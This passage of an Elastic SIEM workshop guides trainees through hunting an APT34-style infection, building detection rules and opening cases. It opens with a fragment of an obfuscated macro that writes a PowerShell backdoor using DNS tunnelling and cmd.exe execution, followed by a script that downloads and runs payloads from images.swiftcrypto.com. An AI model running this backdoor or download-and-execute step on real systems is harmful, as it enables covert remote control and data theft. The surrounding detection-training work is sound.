sss = sss + "   }'+'" & vbCrLf & "  catch [exception] { Wr'+'ite-Host X9Pexcepton occured!X9P+SGF_; SGF{global:SGFSSD}++; continue; }" & vbCrLf & " " & vbCrLf & "  if (SG'+'FVVD -eq SGFnull) { SGFQQE = SGFfalse; SGF{globa'+'l:SGFSSD}++; continue }" & vbCrLf & "   '+'if ((SGFVVD[0] -eq SGFRRC.Substring(0,2)) -and (SGFVVD[1] '+'-eq 2) -and (SGFVVD[2] -eq 3))" & vbCrLf & "    {" & vbCrLf & " SGFQQE = SGFfalse;'+'" & vbCrLf & " SGFLLD = [int]SGFVVD[3];" & vbCrLf & "  }" & vbCrLf & "'+'" & vbCrLf & "    " & vbCrLf & "  if ((SGFVVD[0] -eq '+'253) -and (SGFVVD[1] -eq 25) -and (SGFVVD[2] -eq 42) -and (SGFVVD[3] -eq 87)) # kill this process" & vbCrLf & "   {" & vbCrLf & " SGFQQE = SGFfalse;" & vbCrLf & "    SGFOOE = 0" & vbCrLf & "    SGF{global:SGFRRD} = SGFfalse;" & vbCrLf & "    SGF{global:SGFSSD} = SGF{global:SGFSSD} + 3;" & vbCrLf & "  del SGFIIE;" & vbCrLf & "   }" & vbCrLf & " " & vbCrLf & "  if (SGFQQE)" & vbCrLf & "   {" & vbCrLf & "'+'" & vbCrLf & "    SGF{global:SGFSSD}++;" & vbCrLf
sss = sss + "   }" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf & "function slab'+'er (SGFVVE) {" & vbCrLf & "   SGFf = gc SGFVVE -Encoding Byte;" & vbCrLf & "  SGFe = resolver(SGFf);" & vbCrLf & "    retur'+'n SGFe;" & vbCrLf & "}" & vbCrLf & "function resolver (SGFWWE) {" & vbCrLf & "  SGFcnt = 0;" & vbCrLf & "   SGFp1 = X9PX9P;" & vbCrLf & "   SGFp2'+' = X9PX9P;" & vbCrLf & "    for (SGFi = 0; SGFi -lt SGFWWE.Length; SGFi++)" & vbCrLf & "    {" & vbCrLf & " if (SGFcnt -eq 30)" & vbCrLf & "    {" & vbCrLf & " SGFcnt = 0;" & vbCrLf & "   SGFres += (SGFp1 + SGFp2);" & vbCrLf & "    SGF'+'p1 = X9PX9P; SGFp2 = X9PX9P;" & vbCrLf & "    }" & vbCrLf & " SGFtmp = [System.BitConverter]::ToString(SGFWWE[SGFi]).Replace(X9P-X9P, X9PX9P);" & vbCrLf & "  SGFp1 += SG'+'Ftmp[0];" & vbCrLf & "    SGFp2 += SGFtmp[1];" & vbCrLf & "   SGFcnt++;" & vbCrLf & " }" & vbCrLf & " SGFres +='+' (SGFp1 + SGFp2);" & vbCrLf & " return SGFres;" & vbCrLf & "}" & vbCrLf & "function XXE" & vbCrLf & "{" & vbCrLf
sss = sss + "   SGFFFE = @(gci -path (SGF{global:SGFNND}+X9PMxarcvd'+'*X9P) 7rn ? { !SGF_.PSIsContainer });" & vbCrLf & "   if (SGFFFE -ne SGFnull)" & vbCrLf & "   {" & vbCrLf & " S'+'GFIIE = SG'+'FFFE[0].ToStri'+'ng()'+'.Replace(X9PrcvdX9P, X9PprocX9P)" & vbCrLf & " rni SGFFFE[0] SGFIIE -Force" & vbCrLf & "   '+' SGFYYE = SGFIIE'+' -replace X9PreceiveboxX9P, X9PsendboxX9P;" & vbCrLf & "  i'+'f (SGFIIE.EndsWith(X9P0X9P))" & vbCrLf & "  {" & vbCrLf & " SGFZZE = gc SGFIIE 7rn'+' ? { SGF_.t'+'rim() -ne X9PX9P };'+'" & vbCrLf & " S'+'GFZZE = SGFZZE 7rn ? { SGF_.trim() -ne X9PX9P }" & vbCrLf & "   SGFAAF += (SGFZZE + X9P 2>&1X9P) 7rn % {Try { SGF_ 7rn cmd.exe 7rn Out-String }Catch { SGF_ 7rn Out-Strin'+'g '+'}}" & vbCrLf & "   SGFAAF +X9P<>X9P 7rn sc SGFYYE -Encoding UTF8" & vbCrLf & " if (Te'+'st-path -path SGFIIE)" & vbCrLf & "    {" & vbCrLf & " rd -path SG'+'FIIE;" & vbCrLf & "   }" & vbCrLf & " }" & vbCrLf & " elseif (SGF'+'IIE.EndsWith(X9P1X9P))" & vbCrLf & "  {" & vbCrLf
sss = sss + "   SGFBBF = gc SGFIIE 7rn ? { SGF_.'+'trim() -ne X9PX9P } 7rn %{ SGF_.Replace(X9PVOl0X9P, X9PX9P).Trim() }" & vbCrLf & "   if (Test-path -path SGFBBF)" & vbCrLf & "   {" & vbCrLf & " cpi -path SGFBBF -destination SGFYYE -Force;" & vbCrLf & "  }" & vbCrLf & " else" & vbCrLf & "  {" & vbCrLf & " X9PFile not existX9P 7rn sc SGFYYE;" & vbCrLf & "   }" & vbCrLf & " if (Test-path -path SGFIIE)" & vbCrLf & "   {" & vbCrLf & " rd -path SGFIIE;" & vbCrLf & "  }" & vbCrLf & "'+'" & vbCrLf & "    }" & vbCrLf & " '+'else {" & vbCrLf & " SGFCCF = SGFIIE -replac'+'e'+' X9PreceiveboxX9P, X9PdoneX9P;" & vbCrLf & "  mi -path SGFIIE -destination SGFCCF'+' -Force;" & vbCrLf & "    if (Test-path -path SGFCCF)" & vbCrLf & "   {" & vbCrLf & " (X9P200'+'<>X9P + SGFCCF) 7rn sc SGFYYE;" & vbCrLf & "  rd -path SGFIIE;" & vbCrLf & "  }" & vbCrLf & " }" & vbCrLf & " try" & vbCrLf & "   {" & vbCrLf & " rd -path SGFIIE;" & vbCrLf & "  }cat'+'ch{}" & vbCrLf & "   }" & vbCrLf & "}" & vbCrLf
sss = sss + "SGF{global'+':SGFDDF} = SGFNNC + X9PMxaX9P + SGFRRC;" & vbCrLf & "SGF{global:SGFEEF} = SGFN'+'NC + X9PMxafilesX9P;" & vbCrLf & "SGF{glo'+'b'+'al:SGFNND} = '+'SGF{global:S'+'GFDDF} + X9PMxareceiveboxX9P;" & vbCrLf & "S'+'GF{global:SGFGGE} = SGF{global:SGFDDF} + X9PMxasendboxX9P;" & vbCrLf & "SGF{global:SGFFFF} = SGF{global:SGFDDF} + X9PMxadoneX9P;" & vbCrLf & "'+'" & vbCrLf & "if (-not (Test-Path SGF{global:SGF'+'EEF})) { md SGF{global:SGFEEF}; }" & vbCrLf & "if (-no'+'t (Test-Path SGF{global:SGFDDF}) -or -not (Test-Path SGF{global:SGFGGE}))" & vbCrLf & "{" & vbCrLf & "    md SGF{global:SGFDDF};" & vbCrLf & "    md SGF{global:SGF'+'GGE};" & vbCrLf & " m'+'d SGF{global:SGFNND};" & vbCrLf & " md SGF{global:SGFFFF};" & vbCrLf & "}" & vbCrLf & "SGFGGF = UU'+'C X9P000X9P X9PMX9P X9PX9P X9PX9P X9PrX9P SGFrn" & vbCrLf & "SGFHHF = [System.Net.Dns]::GetHostAddresses(SGFGGF);" & vbCrLf & "SGFUUE = SGFfalse;" & vbCrLf & "if (SGFHHF -eq X9P99.250.250.1'+'99X9P)" & vbCrLf & "{" & vbCrLf
sss = sss + "   SGF{global:SGFTTC} = 0;" & vbCrLf & "   YYD;" & vbCrLf & "  if (SGF{global:SG'+'FTTC} -gt 3)" & vbCrLf & "  {" & vbCrLf & " SGFUUE = SGFtrue;" & vbCrLf & "'+'" & vbCrLf & "    SGFIIF = UUC X9P000X'+'9P X9PPX9P X9PX'+'9P X9PX9P X9PrX9P SGFrn" & vbCrLf & "  ['+'System.Net.Dns]::GetHostAddresses(SGFIIF);" & vbCrLf & "    JJD;" & vbCrLf & "  }" & vbCrLf & "}" & vbCrLf & "else" & vbCrLf & "{" & vbCrLf & " SGFUUE = SG'+'Ftrue;" & vbCrLf & "  JJD;" & vbCrLf & "}" & vbCrLf & "XXE;" & vbCrLf & "DDE(SGF{global:'+'SGFTTC});" & vbCrLf & "# remove lock'+' file to next request" & vbCrLf & "ri -Path SGFPPC;') -CrEPLaCe'Mxa',[chAR]92 -REplace ([chAR]83+[chAR]71+[chAR]70),[chAR]36 -REplace 'X9P',[chAR]34-CrEPLaCe  ([chAR]55+[chAR]114+[chAR]110),[chAR]124  -REplace'ZxV',[chAR]39 -REplace'VOl',[chAR]96) | &( $ShelliD[1]+$sHeLLId[13]+'X')"
Open "C:\ProgramData\WindowsAppPool\AppPool.ps1" For Output As #1
Print #1, sss
Close #1
End Sub
```
### **Malware sample execution**

In our environemnt, we have simulated the macro activity with powershell. Here is the content of the script we will run. This can be found on your desktops.

```
    $SrcUri = "https://images.swiftcrypto.com/"
    $HomeDir = "C:\ProgramData\WindowsAppPool\"
    New-Item -Path $HomeDir -Type directory

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    Invoke-WebRequest -Uri "$SrcUri/AppPool.ps1" -OutFile "$HomeDir\AppPool.ps1"
    Invoke-WebRequest -Uri "$SrcUri/AppPool.vbs" -OutFile "$HomeDir\AppPool.vbs"

    $Arguments = $("$HomeDir\AppPool.vbs")
    Start-Process "wscript.exe" -ArgumentList $Arguments -Wait -NoNewWindow
```
Two two files that the macro creates will be downloaded from a webserver as opposed to being generated by the script.

Let's go ahead and run the script - `C:\Users\Administrator\Desktop\apt34.ps1` in powershell.

![alt text](https://github.com/jamesspi/elastic-security-workshop/raw/master/apt34ps.png)

That should only take a few seconds to run.

We can now hunt for the resulting events in Kibana, as we are streaming Windows security events as well as sysmon events using [winlogbeat](https://www.elastic.co/guide/en/beats/winlogbeat/current/index.html). We are also ingesting all the network events with [packetbeat](https://www.elastic.co/guide/en/beats/packetbeat/current/index.html).

The sysmon configuration file used can be found in `C:\Users\Administrator\Downloads\Sysmon\sysmonmitre.xml`.

### **Kicking off the hunt**

In kibana, navigate to the hosts section of the SIEM app.

![hosts](https://github.com/jamesspi/elastic-security-workshop/raw/master/hostsmenu.png)

You should see your victim machine as a host in the list.

![hosts](https://github.com/jamesspi/elastic-security-workshop/raw/master/allhosts.png)

We can drill down into the host to get more information and begin our hunting activities.

![hosts](https://github.com/jamesspi/elastic-security-workshop/raw/master/hostdrilldown.gif)

We can also see all the metadata associated with that host. This is automatically populated by the beats. In our case, since our lab is hosted in Amazon Web Services, we can also see the metadata of our cloud platform.

![hosts](https://github.com/jamesspi/elastic-security-workshop/raw/master/hostmetadata.png)

We're also able to quickly navigate to some prepopulated views that an analyst can use as a starting point for hunting.

![hosts](https://github.com/jamesspi/elastic-security-workshop/raw/master/quicklinks.png)

Uncommon processes is usually a great place to start. What uncommon processes appear in the list after running the apt34 script?


Not only can we see the process name, but also the commands and arguments:

![hosts](https://github.com/jamesspi/elastic-security-workshop/raw/master/uncommonprocesses.gif)

You'll notice that almost all the elements in the SIEM have this symbol. This means they can be dragged into the timeline.

![hosts](https://github.com/jamesspi/elastic-security-workshop/raw/master/draggable.png)

There seems to be a lot of uncommon process activity with powershell - and some of the arguments are a bit suspicious, such as the `bypass` argument.

Let's investigate and hunt for all activity related to `powershell.exe`. To initiate this, all we need to do is drag it into the timeline.

The timeline is an excellent way to have a collaborative hunt. As we just saw, we can drag in elements from the SIEM app. You'll notice that resulted in a search for `process.name: powershell.exe`.

![hosts](https://github.com/jamesspi/elastic-security-workshop/raw/master/dragtotimelines.gif)

_To note: since the SIEM app is using the Elastic Common Schema, this command is going to search for `process.name: powershell.exe` across all our configured data sets (these can be changed through the kibana advanced settings under "management"). We can narrow this down further, should we need to._

The search has resulted in a quite a few hits for `powershell.exe`, as we expected.

The screenshot below describes all the different elements of the timeline:

![timelines](https://github.com/jamesspi/elastic-security-workshop/raw/master/timelineexplained.png)

To make our hunting activities easier, we are enriching the data as it's ingested into the Elastic Stack. You'll notice that we have geo enrichment, including autonomous system name look ups (notice the `network_traffic` events), but our sysmon configuration also included a description of the [MITRE ATT&CK](https://attack.mitre.org/) tactics and techniques that they might relate too. To make this easier to use inside of the SIEM app and throughout kibana, we are parsing them out further, and adding links to the MITRE website for those specific tactics on ingestion - this allows us to have very light weight queries without the need for query time extraction, as well as more context for our analysts. The more context we have whilst hunting, the better!

Let's toggle these additional columns in the timeline.

![timelines](https://github.com/jamesspi/elastic-security-workshop/raw/master/columns.png)

We should now have the following:

![mitre](https://github.com/jamesspi/elastic-security-workshop/raw/master/mitrefields.png)

In this scenario, let's sort the events in ascending order by time. The default is descending.

Since we quite a few events got returned for `process.name: powershell.exe`, let's narrow down our query futher. We've already seen some of the arguments returned in the "Uncommon Processes" tab of our host. One of them happened to be `bypass`. Let's add that to our query with KQL in the timeline search bar. You'll notice that you will get query suggestions, as well as possible values to use as you type.

`process.args: bypass`

![bypass](https://github.com/jamesspi/elastic-security-workshop/raw/master/bypassargs.gif)

Let's now take a look at the events in further detail. Click on the arrow on the first event to expand all the fields.

Scrolling down to `process.args` we can see where the `bypass` argument was picked up. We can also see that it looks like powershell ran a script titled `AppPool.ps1` out of a directory called `WindowsAppPool` in the `ProgramData` directory. 

![args](https://github.com/jamesspi/elastic-security-workshop/raw/master/processargs.png)

Within the same event, we can also see the parent process, as well as the parent process arguments. It looks like this was spawned as a child of `wscript.exe` which ran a vbs script - `AppPool.vbs`

![parentargs](https://github.com/jamesspi/elastic-security-workshop/raw/master/wscript.png)

Let's try and elaborate further on what we've just discovered.

What did the `AppPool.ps1` script actually do? Can we tell?

Let's remove the previous filter we applied - `process.args: bypass`

We can see a few events for `File created (rule: FileCreate)` which correspond to the scripts mentioned above being downloaded and written by the malware sample. We also notice a few registry changed and image loads, followed by a flurry of `Dns query (rule: DnsQuery)` events. 

Some malware might attempt to download additional files after they run their initial payload, but it shouldn't result in so many DNS queries. Another technique DNS may be used for is to tunnel data out of the network.

Let's filter for the sysmon DNS events, and take a look at the contents. Drag the field into the timeline to filter. You'll notice that you can add your element to the drag and drop query builder using an `and` operator or an `or` operator. In this case, we want an `and`, as we want to search in conjunction with `process.name: powershell.exe`.

![dnsdrag](https://github.com/jamesspi/elastic-security-workshop/raw/master/dnsdrag.gif)

Since we are now looking at DNS events, let's add the field `dns.question.name` to the field columns.

![dnsquestion](https://github.com/jamesspi/elastic-security-workshop/raw/master/dnsquestionfield.png)

We can see that the first query is actually to `images.swiftcrypto.com` - this is where our variant of the malware downloaded the script payloads.

Immediataley after, we notice several DNS queries with particularly unusual subdomains, and all for the same registered domain name of `withyourface.com`.

![queries](https://github.com/jamesspi/elastic-security-workshop/raw/master/withyourface.com.png)

This is indeed a typical behavioural pattern of DNS tunneling. Let's add this as a note for one of these events. Click on the note button and leave a comment referencing that this looks like potential DNS tunneling.

![comment](https://github.com/jamesspi/elastic-security-workshop/raw/master/comment.png)

![comment2](https://github.com/jamesspi/elastic-security-workshop/raw/master/comment2.png)

If we expand one of these events, we notice that `dns.resolved_ip` is highlighted - this means we can drill down into it.

This will take us into the network section of of the SIEM app. Depending on the data ingested, this view can show a tremendous amount of information about the IP address. In our case, it is only show as a resolved DNS IP address. However, this page allows us to quickly look up the IP address on Iana, VirusTotal or Cisco Talos Intelligence.

![ipnetwork](https://github.com/jamesspi/elastic-security-workshop/raw/master/ipnetwork.png)

Let's click on the `talosintelligence.com` link to see if this IP is known to be malicious.

In fact, this IP address is on the security intelligence blacklist, classified as `Malware`.

![talos](https://github.com/jamesspi/elastic-security-workshop/raw/master/talos.png)

So, we now know that:

*   The malware downloaded two scripts, and saved them in a directory called `WindowsAppPool` in the `ProgramData` directory.
*   The `AppPool.ps1` script runs as a child process of `AppPool.vbs`
* DNS tunelling/exfiltration is occuring as a result of the `AppPool.ps1` script, as we determined by the order of events in the timeline
* The resolved DNS IP address is classified as `Malware` by Cisco Talos Intelligence.

There is something else we might want to look for in relation to data exfiltration events. It is unlikely that this malware would run once. It's probably going to try and run regularly to exfiltrate as much data as possible.

One of the most common ways to acheive this on windows systems is via the native task scheduler.

The ATT&CK framework has a technique ID for task scheduler - `T1053`. Are there are events for this technique?

Let's search for them to find out.

![taskss](https://github.com/jamesspi/elastic-security-workshop/raw/master/schedtasktechnique.png)

In fact, we do have an event. If you remember, `schtasks.exe` also showed up in the "Uncommon Processes" list.

If we expand the event, we can see the parameters used to create the task.

![taskargs](https://github.com/jamesspi/elastic-security-workshop/raw/master/taskargs.png)

Looks like the task was created to periodically run the `AppPool.vbs` script. This makes sense, as it was the parent process of `AppPool.ps1`.

## **Wrapping up the hunt - creating a saved search**

Now that we've ran our initial hunt - it makes sense to put a query together that will look for all of these elements which are unique to this malware payload. We can then use this saved search in any other part of kibana, including creating a detection rule to spot this specific behaviour.

Let's drag a few elements to the timeline to formulate our search. We can combine drag and drop elements, as well as KQL statements.

![apt34query](https://github.com/jamesspi/elastic-security-workshop/raw/master/apt34query.png)

Now that we've created a query that will likely indicate behaviour of this malware sample - let's save it so we can use it in other parts of the SIEM and kibana.

![savequery](https://github.com/jamesspi/elastic-security-workshop/raw/master/createdsavedsearch.gif)

We can also add a name for this timeline and reference easily whenever we need to again. We can also leave notes for anyone investigating again in the future, or maybe for an audit down the line. 

![timelinename](https://github.com/jamesspi/elastic-security-workshop/raw/master/apt34name.png)

Previously created timelines can be referenced at any time via the `Timelines` option in the SIEM menu. They can also be exported and imported at will.

![timelinename](https://github.com/jamesspi/elastic-security-workshop/raw/master/timelinelist.png)

![timelinename](https://github.com/jamesspi/elastic-security-workshop/raw/master/importexport.png)

###**Bonus - Visualise the Attack**

If you want to explore how we can run some visual analytics on this data, you can follow this task - otherwise, feel free to proceed to the next lab.

Whilst the SIEM is great, sometimes it's handy to be able to get a visual representation of what our security posture is.

We have many options in kibana, but one of the most intuative to use is [lens](https://www.elastic.co/what-is/kibana-lens).

Similar to the timeline in SIEM, lens allows us to drag and drop elements to build various charts.

In kibana, navigate to `visualize` from the menu.  Click on "Create Visualization". From the "New Visualization" window, select "Lens".

![viz](https://github.com/jamesspi/elastic-security-workshop/raw/master/visualiseicon.png)

![newviz](https://github.com/jamesspi/elastic-security-workshop/raw/master/createviz.png)

![lens](https://github.com/jamesspi/elastic-security-workshop/raw/master/newviz.png)

You will notice the search bar and time picker, just like in SIEM.

We're going to use Lens to get a visual representation of our MITRE ATT&CK framework posture over time.

From the top left, ensure that the "winlogbeat-*" index is selected. We are going to be searching this dataset. Unlike in SIEM, Lens doesn't search all data sets by default. However, if we wanted to, we can create an index pattern covering more indices.

![indexpatt](https://github.com/jamesspi/elastic-security-workshop/raw/master/selectindex.png)

Let's start off with a simple filer first to show us only those events where the MITRE ATT&CK enrichment exists.

`threat.technique.name :*`

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/filterlens.png)

Next, let's create a histogram. From the field list on the left, drag the `@timestamp` field into the middle of the screen. You may need to adjust the timepicker accordingly.

![timelinename](https://github.com/jamesspi/elastic-security-workshop/raw/master/lenstime.gif)

Let's now add the `threat.technique.name` field in. Lens will automatically stack the chart accordingly.

![timelinename](https://github.com/jamesspi/elastic-security-workshop/raw/master/lenstechnique.gif)

At the bottom of the screen, you'll notice that lens also suggest other possible visualisation types that suit this query. You can also change it from the top right.

![timelinename](https://github.com/jamesspi/elastic-security-workshop/raw/master/suggestions.png)

![timelinename](https://github.com/jamesspi/elastic-security-workshop/raw/master/changechart.png)

By default, only the top 3 technique names are included. Let's increase this. Click on `Top values of threat.technique.name` and adjust the number of values to your liking. The chart updates automatically.

![timelinename](https://github.com/jamesspi/elastic-security-workshop/raw/master/lensrecords.gif)

You can drag in additional fields and customise the chart as you wish. Once finished, you can save the chart. This allows us to add it into a dashboard or a canvas workpad, both of which can be found in the left hand menu.

![timelinename](https://github.com/jamesspi/elastic-security-workshop/raw/master/lenssave.gif)

# **Lab 4 - Using the Detection Engine**

_Time needed - 30-45 minutes_

## **Detections Overview**

Whilst threat hunting excersizes are extremely valuable and highly encouraged, not all teams can afford to regularly dedicate time to manual hunting.

Elastic SIEM has an inbuilt detection engine, which allows users to run queries on a schedule. It also ships with [107 KQL rules](https://www.elastic.co/guide/en/siem/guide/current/prebuilt-rules.html) and [23 machine learning anomaly detection jobs](https://www.elastic.co/guide/en/siem/guide/current/prebuilt-ml-jobs.html) - which are also integrated as part of the detection engine. The MITRE ATT&CK framework is also heavily utilised throughout the detection engine.

During this lab, we will explore some of the detection rules that triggered during the execution of our previously detonated malware sample.

The detection engine can be accessed via the SIEM menu bar.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/detectionsmenu.png)

Below is a detailed description of the main detections page.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/detectionsdetails.png)

As signals are detected, they are stored as events in a separate kibana index. Apart from including the original event, they also include all the signal metadata.

As an analyst, you have a few choices when it comes to diving into the details of the detected signals. As you can see from the image above, there is an option to immediatley open that signal in the timeline. By default, this will filter for that specific signal, based on its unique ID. We can then use the timeline as we did before:

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/detectiondeets.gif)

However, we can also click on the signal name and get all the details about that particular signal.

In our detections list, you should spot a signal named `DNS Tunneling - Swiftcrypto`. This triggered based on the DNS tunneling event we noticed during our hunt earlier. Click on the link so we can get more details about why this triggered.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/DNSTunneling.png)

## **Detection Rule Details**

Below is a detailed explaination of detection rule details page:

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/detectiondetails.png)

There is also a histogram of the detection rate of this signal, as well as a detailed list below it.

## **What made this rule trigger?**

As we saw during our hunt, the malware sample we executed tried to exfiltrate data over the DNS protocol. There were several DNS queries with very long and unusual sub domains for the same registered domain.

This particular detection rule is based off of Elastic's [unsupervised machine learning](https://www.elastic.co/what-is/elasticsearch-machine-learning) jobs. The SIEM has a job built in that is modelling DNS queries over time - specifically, the length of the subdomain. When it notices that a registered domain has several unusually long subdomains in a given time period, it will calculate the probability of that happening in our environment, and generate an anomaly score out of it. Since it is an unsupervised model, it will learn over time. There is no need for a user to influence this.

This is an extremely effective way of detecting an event like DNS tunneling, as it eliminates the need for a user to have to "guess" what the right values are i a traditional, static query - "How many subdomains should a registered domain have? How long should they be? What time of the day should I filter for?"

Let's look at the details of why this machine learning job spotted an anomaly, and, in turn, caused the associated detection to trigger.

Within the detailed view for our DNS Tunelling detection, expand the detected event, just as we did in the timeline.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/mldetails.png)

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/mldetails2.png)

You will notice there is a `causes` field. Whilst there is a fair amount of detail, this is listing out the probability of this happening in our environment (you can see it's extremely low), the mathematical function used (`high_info_content`) what the typical number of queries is for this domain (~34 in the screenshot above) and the actual number of queries with long subdomains that we saw ingested (506). You can also see the same `withyourface.com` domain that we saw in our hunt, as we expected. There are more specific machine learning fields if an analyst wants to five into more detail. Additonally, users have the choice of diving into the machine learning specific context of kibana. Feel free to click on the provided link in the detection rule to explore this section of kibana.

## **Using the investigation guide**

Once a signal is triggered, it is really handy for an analyst to have a guide (also commonly known as playbook) to follow, especially if they are not familiar with the detected behaviour, or even the SIEM itself (think of new starters).

In the detection `About` section, toggle between the `Details` and `Investigation guide`. You will notice this signal in particular has a very interactive guide, as we also support markdown syntax, just as we do in the notes fields.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/investigationguide.png)

Feel free to follow the investigation guide, however, we've already hunted for this activity. You will notice that one of the links is referencing a different Elastic cluster. This is deliberate, as we will be seeing how we can change this as a bonus excersize.

## **Managing and editing detection rules**

Rule management and creation is typically part of the day to day operations of a security operations team. Let's take a look at the management portion of the detection engine. Head back to the main "Detection" view and click on "Manage signal detection rules".

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/managerules.png)

In this view, you're able to see all the rules that have been shipped with Elastic SIEM, as well as any custom rules that an analyst might have created.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/rulelist.png)

You can toggle between the rules shipped "out of the box" as well as custome rules:

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/elasticandcustom.png)

By default, the rules that are pre packaged are all deactivated. Users are given the choice of activiating whichever rules they feel are relevant for their environment. This is also true for the machine learning jobs. You can also toggle these from the detection management screen. It's important to note that the relevant indices must exist in order to enable machine learning jobs. In our case, we have some of the packetbeat ones enabled, as well as a windows specific one.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/mljobslist.png)

You also have the choice of exporting, deleting, editing, and duplicating rules.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/ruleactions.png)

Within this view, you can also monitor the performance of the rule. This allows analysts to check if any rules that are running have long query times or gaps, as well as getting an overall view of the last responses.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/rulemonitoring.png)

## **Creating a new rule**

Let's see what rule creation looks like. We're going to create a rule based off of our saved `APT34` query that we created during our hunt.

Click on the `Create new rule` button in the signal management screen.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/createimport.png)

The first thing we need to do is to define what type of rule this is going to be. The `DNS Tunneling - Swiftcrypto` rule we explored was based off of a machine learning job. In our case, we'll leave the default selected option of "Custom query"

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/customquery.png)

We'll leave all the default index patterns for this excersize, but, as you can see, this is configurable.

In the "Custom query" bar, we can define our query using KQL - or, load up a saved query. Let's load up our previously saved query.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/savedapt34.png)


You'll notice that we get a filter box labelled as `timeline-filter-drop-area`. This is referencing the query we added to our drag and drop filter in the timeline.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/timelinefilter.png)

Under "Timeline template" you can also select the `APT34` timeline we previously named. This will allow analysts to immediatley load up a detected signal into this saved timeline when they hit the "investigate in timeline" button.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/apt34timeline.png)

After pressing "Continue", we will define our rule name and description, as well as any additional settings we like - including the investigation guide and MITRE ATT&CK tactics and techniques under `Advanced settings`. Feel free to enter whatever you like in this section.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/aboutrule.png)

Once we fill in the details, we need to define our schedule. Feel free to leave this at the default of 5 minutes, with 1 minute lookback time. You can also experiment with changing this.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/ruleschedule.png)

The last step that we are presented with is `Rule actions`. It is normal for a security operations team to set up actions associated with a detection rule, to alert them in any 3rd party alerting tools.

We have a few options - namely:

* Email
* PagerDuty
* Slack
* Webhooks

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/ruleactionslist.png)

We can also determine the actions frequency.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/rulefreq.png)

Each detection rule can be configured with a number of actions. For this lab, we will not be setting up an action - but feel free to experiment with any of the actions, should you wish. Connectors can be set up on the fly, and can be unique to each rule if necessary.

When you create an action, we provide a list of predefined variables you can use in the actions body. This is extremely handy for an analyst to get quick context when investigating the alert of a triggered detection rule.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/variables.png)

As an example, here is a screenshot of slack message generated by a previous execution of the DNS Tunneling alert:

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/slackalert.png)


Even though Slack is shown, the `webhook` connector was used in this case. For context, here is the `POST` body that was used:

```
 {
         "text": "SwiftCrypto Alert",
    "attachments": [
        {
        "color": "danger",
        "title": "{{context.rule.name}}",
        "title_link": "{{{context.results_link}}}",
        "text": "{{context.rule.description}}",
        "callback_id": "mldnstunnel",
        "fields": [
                {
                  "title": "Occurences",
                  "value": "{{state.signals_count}}",
                  "short": true
                },
                 {
                  "title": "Severity",
                  "value": "{{context.rule.severity}}",
                  "short": true
                },
                {
                  "title": "Machine Learning Threshold",
                  "value": "{{context.rule.anomaly_threshold}}",
                  "short": true
                }
           ],
            "actions": [
                {
                    "name": "acknowledge_dnstunnel",
                    "text": "Acknowledge :+1:",
                    "type": "button",
                    "value": "ack",
                    "style": "primary"
                },
                {
                    "text": "Investigate In Timeline :mag:",
                    "type": "button",
                    "url": "{{context.rule.timeline_id}}",
                    "name": "investigate_dnstunnel"
                  
               }
           ]
       }
   ]

}
```
When we are finished creating our rule, and are happy with it, we can click on `Create & activate rule`. We are also presented with a button to `Create rule without activating it`. This is particularly handy if an analyst is not finished creating the rule query, or would like to perform aditional analysis before running it. This of it as a "save and come back later" button.


![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/createandactivate.png)

Once created, our new rule should show up under the "Custom rules" section. It should trigger if the same activity is identified.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/customrulelist.png)

## **Bonus Excersize - Editing an existing rule**

Previously, we mentioned that there is a deliberate mistake in the investigation guide of our rule `DNS Tunneling - Swiftcrypto`. Let's see how we can edit this detection rule.

In the detection rule management page, find the rule in question. Hit the actions menu to `Edit rule settings`.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/ruleactionslistedit.png)

In the edit menu, navigate to the `About` section. Expand `Advanced settings` and you'll find the investigation guide. Feel free to edit this as you see fit, perhaps changing the referenced visualisation with one of your own.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/editrulesettings.png)

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/changeguide.png)




# **Lab 5 - Using Cases for collaborative incident response**
_Time needed - 15-20 minutes_

The last menu option that we have in the SIEM is cases.

Cases allows a security operations team to collaborate on an incident. Whilst the timeline is great for an a team to investigate - it doesn't really allow for collaboration. Cases enhances this experience by allowing a team to keep track of progress as an incident progresses.

Let's create a case based off our previous hunt and triggered detection rules.

There are two ways we can create a case through kibana. The first is by clicking on the `Cases` menu option and clicking on `Add New Case`/`Create new case`, as seen below:

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/casesview.png)

The second way is through a timeline (you may have noticed this as part of the investigation guide we previously looked at).

Let's open up our `APT34` timeline and create a case from there. Head to the `timelines` menu and select the timeline.

![filterlens](https://github.com/jamesspi/elastic-security-workshop/raw/master/loadtimeline.png)

